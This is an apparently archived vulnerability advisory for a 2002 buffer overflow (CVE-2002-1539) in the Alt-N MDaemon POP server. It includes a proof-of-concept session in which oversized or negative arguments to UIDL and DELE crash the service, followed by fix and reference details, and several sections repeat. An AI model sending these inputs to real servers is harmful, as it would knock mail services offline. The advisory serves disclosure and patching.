Alt-N MDaemon POP Server Buffer Overflow Vulnerability
BID:6053
Info
Alt-N MDaemon POP Server Buffer Overflow Vulnerability
| Bugtraq ID: | 6053 |
| Class: | Boundary Condition Error |
| CVE: |
CVE-2002-1539 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 28 2002 12:00AM |
| Updated: | Jul 11 2009 06:06PM |
| Credit: | Discovery of this vulnerability credited to D4rkGr3y <[email protected]>. |
| Vulnerable: |
Alt-N MDaemon 6.0.7 Alt-N MDaemon 6.0.6 Alt-N MDaemon 6.0.5 Alt-N MDaemon 6.0 .0 |
| Not Vulnerable: |
Alt-N MDaemon 6.5 .0 Alt-N MDaemon 5.0.7 Alt-N MDaemon 3.1.2 |
Discussion
Alt-N MDaemon POP Server Buffer Overflow Vulnerability
A buffer overflow vulnerability has been reported for MDaemon. The vulnerability is due to inadequate bounds checking on some POP server commands.
An attacker can exploit this vulnerability by submitting a very large integer value to some commands on the POP server. This will cause the MDaemon service to crash when attempting to process the command.
A buffer overflow vulnerability has been reported for MDaemon. The vulnerability is due to inadequate bounds checking on some POP server commands.
An attacker can exploit this vulnerability by submitting a very large integer value to some commands on the POP server. This will cause the MDaemon service to crash when attempting to process the command.
Exploit / POC
Alt-N MDaemon POP Server Buffer Overflow Vulnerability
The following proof of concepts was provided:
+OK somedomain.com POP MDaemon 6.0.5 ready
<[email protected]>
USER blah
+OK blah... Recipient ok
PASS 123456
+OK [email protected]'s mailbox has 0 total messages (0 octets).
UIDL 2147483647
-ERR no such message
UIDL 2147483648
+OK -2147483648 !!! Index 0 is not used
UIDL 2147483649
Connection to host lost.
---
user dark
+OK dark... Recipient ok
pass ******
+OK dark@dark's mailbox has 13 total messages (2274775 octets).
dele -1
Connection to host lost.
The following proof of concepts was provided:
+OK somedomain.com POP MDaemon 6.0.5 ready
<[email protected]>
USER blah
+OK blah... Recipient ok
PASS 123456
+OK [email protected]'s mailbox has 0 total messages (0 octets).
UIDL 2147483647
-ERR no such message
UIDL 2147483648
+OK -2147483648 !!! Index 0 is not used
UIDL 2147483649
Connection to host lost.
---
user dark
+OK dark... Recipient ok
pass ******
+OK dark@dark's mailbox has 13 total messages (2274775 octets).
dele -1
Connection to host lost.
Solution / Fix
Alt-N MDaemon POP Server Buffer Overflow Vulnerability
Solution:
Alt-N MDaemon 6.5.0 is not vulnerable to this issue.
Fixes available:
Alt-N MDaemon 6.0 .0
Alt-N MDaemon 6.0.5
Alt-N MDaemon 6.0.6
Alt-N MDaemon 6.0.7
Solution:
Alt-N MDaemon 6.5.0 is not vulnerable to this issue.
Fixes available:
Alt-N MDaemon 6.0 .0
-
Alt-N MDaemon 6.5.0
http://www.altn.com/Products/Default.asp?product_id=MDaemon
Alt-N MDaemon 6.0.5
-
Alt-N MDaemon 6.5.0
http://www.altn.com/Products/Default.asp?product_id=MDaemon
Alt-N MDaemon 6.0.6
-
Alt-N MDaemon 6.5.0
http://www.altn.com/Products/Default.asp?product_id=MDaemon
Alt-N MDaemon 6.0.7
-
Alt-N MDaemon 6.5.0
http://www.altn.com/Products/Default.asp?product_id=MDaemon
References
Alt-N MDaemon POP Server Buffer Overflow Vulnerability
References:
References:
- Alt-N Homepage (Alt-N)
- Re: MDaemon SMTP/POP/IMAP server DoS (Muhammad Faisal Rauf Danka
) - RE: MDaemon SMTP/POP/IMAP server DoS ("Robert Feldbauer"
) - RE: MDaemon SMTP/POP/IMAP server DoS ("Basil Hussain"
)